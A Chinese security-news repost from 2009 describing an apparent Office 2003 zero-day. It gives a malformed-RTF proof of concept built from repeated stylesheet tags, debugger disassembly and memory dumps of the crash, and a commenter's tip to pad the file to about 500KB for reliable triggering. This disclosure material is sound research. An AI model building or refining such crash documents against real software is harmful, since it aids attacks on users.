ARP联盟图文中心下载中心手机频道最近更新软件最近更新文章网络热点
您当前的位置→图文中心新闻资讯安全播报又一OFFIE 0DAY漏洞
站内搜索:

又一OFFIE 0DAY漏洞


2009/5/21  编辑:佚名 来源:本站整理 

这个doc的要利用有一定难度:

  poc如下:

  \rtf1\ansi\ansicpg409\deff0\deflang1033

  \fonttbl\f0\fmodern\fprq6\fcharset0 DOTUM;

  \stylesheet\stylesheet\stylesheet\stylesheet\.........\stylesheet

  .................hi.baidu.com/wordexp\par

  出错指令:

  :u 30cffca0 l 20

  001B:30CFFCA0 8B06 MOV EAX,[ESI] >here

  001B:30CFFCA2 51 PUSH ECX

  001B:30CFFCA3 56 PUSH ESI

  001B:30CFFCA4 C745F010000000 MOV DWORD PTR [EBP-10],00000010

  001B:30CFFCAB FF501C CALL [EAX+1C] >and here

  001B:30CFFCAE F645F401 TEST BYTE PTR [EBP-0C],01

  001B:30CFFCB2 5F POP EDI

  001B:30CFFCB3 7406 JZ 30CFFCBB

  001B:30CFFCB5 81CB00000200 OR EBX,00020000

  001B:30CFFCBB 5E POP ESI

  001B:30CFFCBC 8BC3 MOV EAX,EBX

  001B:30CFFCBE 5B POP EBX

  001B:30CFFCBF C9 LEAVE

  分析:

  :d esi l 4

  0010:00189BD0 B0 78 3F 01 B0 78 3F 01-B0 78 3F 01 B0 78 3F01.x?..x?..x?..x?.

  :d eax l 160

  0010:013F78B0 66 00 69 00 6C 00 65 00-3A 00 2F 00 2F 00 2F00f.i.l.e.:./././.

  0010:013F78C0 43 00 3A 00 5C 00 44 00-6F 00 63 00 75 00 6D00C.:.\.D.o.c.u.m.

  0010:013F78D0 65 00 6E 00 74 00 73 00-25 00 32 00 30 00 6100e.n.t.s.%.2.0.a.

  0010:013F78E0 6E 00 64 00 25 00 32 00-30 00 53 00 65 00 7400n.d.%.2.0.S.e.t.

  0010:013F78F0 74 00 69 00 6E 00 67 00-73 00 5C 00 53 00 6300t.i.n.g.s.\.S.c.

  0010:013F7900 7A 00 5C 00 4C 68 62 97-5C 00 6D 00 73 00 3000z.\.Lhb.\.m.s.0.

  0010:013F7910 78 00 2D 00 30 00 78 00-78 00 5C 00 6D 00 7300x.-.0.x.x.\.m.s.

  0010:013F7920 30 00 39 00 2D 00 30 00-78 00 78 00 25 00 32000.9.-.0.x.x.%.2.

  0010:013F7930 30 00 43 00 56 00 45 00-2D 00 32 00 30 00 30000.C.V.E.-.2.0.0.

  0010:013F7940 39 00 2D 00 78 00 78 00-78 00 78 00 25 00 32009.-.x.x.x.x.%.2.

  0010:013F7950 30 00 73 00 74 00 79 00-6C 00 65 00 73 00 68000.s.t.y.l.e.s.h.

  0010:013F7960 65 00 65 00 74 00 5C 00-00 00 78 00 70 00 2E00e.e.t.\...x.p...

  0010:013F7970 64 00 6F 00 63 00 00 00-00 00 00 00 00 00 0000d.o.c...........

  出错时 eip=006d0075

  测试版本:office 2003 sp3 11.8169.8172(更新一些的比如82xx也行,应该还是0day)

  鬼仔注:原地址评论部分--

  有好几个朋友发消息说POC不能成功,是这样子的

  \rtf1\ansi\ansicpg409\deff0\deflang1033

  \fonttbl\f0\fmodern\fprq6\fcharset0 DOTUM;

  \stylesheet\stylesheet\stylesheet\stylesheet\stylesheethi.baidu.com/wordexp\par

  那个\stylesheet要加很多个,整个文件的大小达到500KB左右就能

  比较稳定的在文章中所说的指令出错,如果POC比较小可能在其它

  指令出错.

  编辑推荐

  IE7曝严重0day漏洞黑客利用该漏洞疯狂攻击

参考消息:http://www.arpun.com/  与黑客竞争操作系统如何提前应对0Day漏洞

更多精彩,请查看本类栏目: 新闻资讯 - 安全播报
除非注明,ARP联盟文章来于网络,投稿原创等,转载请以链接形式标明本文地址。
本文地址:http://www.arpun.com/article/3505.html

相关文章
  • ·[组图]又一个有趣的泄密:美国太空总署科学家告诉我们月球上有「其他人」
  • ·又一位科学家证明灵魂的存在濒死体验并非是无稽之谈
  • ·[图文]《蒸汽战歌》初体验评测 又一横版格斗手游力作
  • ·QQ旋风云播功能暂停服务 又一腾讯业务关闭
  • ·[图文]又一外星人尸体残骸,女孩目睹UFO坠落
  • ·继熊猫烧香后又一厉害病毒清除方法
  • ·又一OFFIE 0DAY漏洞
  • ·木马病毒又一查杀方法
  • 发表评论
    栏目列表
    阅读排行
    本类最新
    网站帮助 - 广告合作 - 下载声明 - 网站地图